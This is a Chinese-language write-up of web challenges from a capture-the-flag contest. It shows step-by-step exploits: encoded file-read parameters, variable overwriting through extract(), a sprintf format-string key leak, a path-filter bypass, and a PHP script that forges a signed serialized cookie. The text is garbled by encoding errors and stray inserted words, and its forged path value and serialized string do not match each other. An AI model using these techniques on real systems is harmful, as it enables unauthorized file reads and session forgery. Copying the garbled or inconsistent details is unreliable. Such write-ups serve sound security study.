又是沒有進(jìn)入復(fù)賽的ctf
繼續(xù)留下沒有技術(shù)的淚水
希望下次再加油吧加缘!
1 滴~
2 web簽到題
3 Upload-IMG
4 大吉大利今晚吃雞
5 Misc-wireshark
1 滴~
察覺到j(luò)pg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09有問題
發(fā)現(xiàn)加密形式是base64_encode(base64_encode(bin2hex($jpg))
解密得到是flag.jpg
以同樣加密方式構(gòu)造index.php
得到index.php源碼
base64解密之后:
<?php
/*
* https://blog.csdn.net/FengBanLiuYun/article/details/80616607
* Date: July 4,2018
*/
error_reporting(E_ALL || ~E_NOTICE);
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
發(fā)現(xiàn)注釋中有一個(gè)url提示:https://blog.csdn.net/FengBanLiuYun/article/details/80616607
這里有個(gè)比較坑的點(diǎn).......這篇文章不是真正的hint
我還看了很久......想著怎么繞過preg_replace
還是太naive了
這位老哥博客的訪問量嗖嗖的增
評(píng)論也是特別的有趣
看到注釋還有 Can you find the flag file?
猜測可能要找到的是一個(gè)文件
翻這個(gè)博主的博客發(fā)現(xiàn)提到文件的一篇文章
https://blog.csdn.net/FengBanLiuYun/article/details/80913909
以上面的加密方式構(gòu)造practice.txt.swp
base64解密后得到:f1ag!ddctf.php
根據(jù) Can you find the flag file?猜測這是一個(gè)文件名
從源碼中可知config被過濾為漠酿!
所以構(gòu)造文件名為:f1agconfigddctf.php
得到文件源碼
<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
$content=trim(file_get_contents($k));
if($uid==$content)
{
echo $flag;
}
else
{
echo'hello';
}
}
?>
需要構(gòu)造uid變量和k文件內(nèi)容一致
這里是一個(gè)變量覆蓋漏洞
構(gòu)造uid=&k= 即可得到flag
其實(shí)這題有一部分應(yīng)該是根據(jù)百度杯的一道CODE 50pt出的
有興趣可以看看
2 web簽到題
提示沒有權(quán)限訪問
查看源碼 - 發(fā)現(xiàn)js/index.js
beforeSend: function (XMLHttpRequest) {
XMLHttpRequest.setRequestHeader("didictf_username", "");
},
bp抓包增加header頭:didictf_username:admin
訪問/app/fL2XID2i0Cdh.php
獲得源碼
其中察覺get_key函數(shù)
private function get_key() {
//eancrykey and flag under the folder
$this->eancrykey = file_get_contents('../config/key.txt');
}
要想獲得eancrykey
if(!empty($_POST["nickname"])) {
$arr = array($_POST["nickname"],$this->eancrykey);
$data = "Welcome my friend %s";
foreach ($arr as $k => $v) {
$data = sprintf($data,$v);
}
parent::response($data,"Welcome");
}
代碼審計(jì)可知需要設(shè)置cookie 步入session_read函數(shù)
并且POST傳入nickname參數(shù)
可以發(fā)現(xiàn)如果POST方式傳nickname='a'
此時(shí)arr=['a',$this->eancrykey]
循環(huán)中執(zhí)行sprintf(data,'a')
則data='welcome my friend a'
再次執(zhí)行sprintf則不會(huì)傳入eancrykey參數(shù)
若POST方式傳nickname='%s'
執(zhí)行sprintf(data,'%s')
則data='welcome my friend %s'
再次執(zhí)行sprintf則傳eancrykey參數(shù)入格式符%s輸出
找到key之后還要去看如何利用
看到這里有文件包含漏洞
public function __destruct() {
if(empty($this->path)) {
exit();
}else{
$path = $this->sanitizepath($this->path);
if(strlen($path) !== 18) {
exit();
}
$this->response($data=file_get_contents($path),'Congratulations');
}
exit();
}
猜測敏感flag文件為:../config/flag.txt(長度正好為18)
private function sanitizepath($path) {
$path = trim($path);
$path=str_replace('../','',$path);
$path=str_replace('..\\','',$path);
return $path;
}
path有過濾,構(gòu)造...\\./config/flag.txt繞過
要去找調(diào)用__destruct的地方
__destruct構(gòu)折函數(shù)在對(duì)象被銷毀時(shí)被調(diào)用
unserialize函數(shù)將會(huì)自動(dòng)調(diào)用對(duì)象__wakeup和__destruct函數(shù)
發(fā)現(xiàn)可利用函數(shù)
var $cookie_name = 'ddctf_id';
$session = $_COOKIE[$this->cookie_name];
if(!isset($session)) {
parent::response("session not found",'error');
return FALSE;
}
$hash = substr($session,strlen($session)-32);
$session = substr($session,0,strlen($session)-32);
if($hash !== md5($this->eancrykey.$session)) {
parent::response("the cookie data not match",'error');
return FALSE;
}
$session = unserialize($session);
看到服務(wù)器端會(huì)檢驗(yàn)cookie中ddctf_id參數(shù)中最后32位
檢驗(yàn)其是否等于md5(this->eancrykey.$session)
this->eancrykey在上面已經(jīng)獲得
開始構(gòu)造session
<?php
class Session{
var $path='....\\/config/flag.txt';
}
$k=new Session();
echo serialize($k);
echo md5('EzblrbNS'.serialize($k));
?>
構(gòu)造ddctf_id=O:7:"Session":1:{s:4:"path";s:21:"..../config/flag.txt";}4b5ba6958a9873f456c2928b64b0be4d
得到flag散罕!
